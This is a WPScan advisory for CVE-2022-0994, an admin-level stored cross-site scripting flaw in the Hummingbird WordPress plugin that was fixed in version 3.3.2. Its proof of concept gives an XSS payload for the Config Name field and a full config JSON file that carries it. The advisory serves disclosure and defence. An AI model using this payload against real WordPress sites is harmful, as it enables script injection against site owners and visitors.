WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

Proof of Concept

Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and Click 'Apply' to trigger the XSS

Go to Hummingbird's Settings > Configs and Upload the following config
{
  "id": 1,
  "name": "<img src onerror=alert(/XSS/)>",
  "description": "Xss",
  "config": {
    "configs": {
      "settings": {
        "advanced": {
          "query_string": false,
          "emoji": false,
          "cart_fragments": false,
          "lazy_load": {
            "enabled": false
          }
        },
        "database": {
          "reports": {
            "enabled": false
          }
        },
        "gravatar": {
          "enabled": true
        },
        "page_cache": {
          "enabled": true,
          "detection": "auto",
          "integrations": {
            "varnish": false,
            "opcache": false
          },
          "preload": false
        },
        "performance": [],
        "rss": {
          "enabled": true,
          "duration": 3600
        },
        "settings": {
          "accessible_colors": false,
          "remove_settings": false,
          "remove_data": false,
          "control": true
        },
        "uptime": {
          "enabled": false
        }
      }
    },
    "strings": {
      "advanced": [
        "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
      ],
      "database": [
        ""
      ],
      "gravatar": [
        "Gravatar cache - Active\n"
      ],
      "page_cache": [
        "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
      ],
      "rss": [
        "RSS caching - Active\n"
      ],
      "settings": [
        "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
      ],
      "uptime": [
        "Uptime - Inactive\n"
      ]
    }
  },
  "plugin": "1081721"
}

Affects Plugins

hummingbird-performance
Fixed in version 3.3.2

References

CVE
CVE-2022-0994

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Taurus Omar

Submitter

Taurus Omar

Submitter website
https://taurusomar.com
Submitter twitter
TaurusOmar_
Verified

Yes

WPVDB ID
e9dd62fc-bb79-4a6b-b99c-60e40f010d7a

Timeline

Publicly Published

2022-03-23 (about 4 months ago)

Added

2022-03-23 (about 4 months ago)

Last Updated

2022-04-13 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin